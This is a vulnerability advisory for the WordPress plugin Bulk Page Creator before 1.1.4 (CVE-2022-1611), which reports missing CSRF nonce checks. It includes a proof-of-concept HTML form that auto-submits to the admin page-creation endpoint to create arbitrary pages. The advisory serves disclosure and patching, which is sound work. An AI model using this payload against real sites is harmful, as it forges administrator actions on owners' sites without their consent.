Bulk Page Creator < 1.1.4 – Arbitrary Page Creation via CSRF | CVE 2022-1611 | Plugin Vulnerabilities

Description

The plugin does not protect its page creation functionalities with nonce checks, which makes them vulnerable to CSRF.

Proof of Concept

<form id="test" action="https://example.com/wp-admin/options-general.php?page=sc_bpc_page" method="POST">
    <textarea name="sc-pages">0|-1|123|
1|-1|bbb|
2|-1|ccc|
3|-1|spam content|
</textarea>
    <input type="text" name="pcontent" value="2">
    <input type="text" name="posttype" value="publish">
    <input type="text" name="sc-pages-content" value="some post content">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

bulk-page-creator

Fixed in 1.1.4

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

3843b867-7784-4976-b5ab-8a1e7d45618a

Timeline

Publicly Published

2022-05-09 (about 3 years ago)

Added

2022-05-09 (about 3 years ago)

Last Updated

2022-05-10 (about 3 years ago)

Other

Published

Title

Published

2025-06-02

Title

Contact Forms by Cimatti Plugin < 1.9.9 - Cross-Site Request Forgery

Published

2023-11-28

Title

AdFoxly – Ad Manager, AdSense Ads & Ads.txt <= 1.8.5 - Cross-Site Request Forgery

Published

2023-12-26

Title

Rise Blocks – A Complete Gutenberg Page Builder < 3.2 - Cross-Site Request Forgery

Published

2022-05-26

Title

Seamless Donations < 5.1.9 - Arbitrary Settings Update via CSRF

Published

2025-04-01

Title

WP Profitshare <= 1.4.9 - Cross-Site Request Forgery to Stored Cross-Site Scripting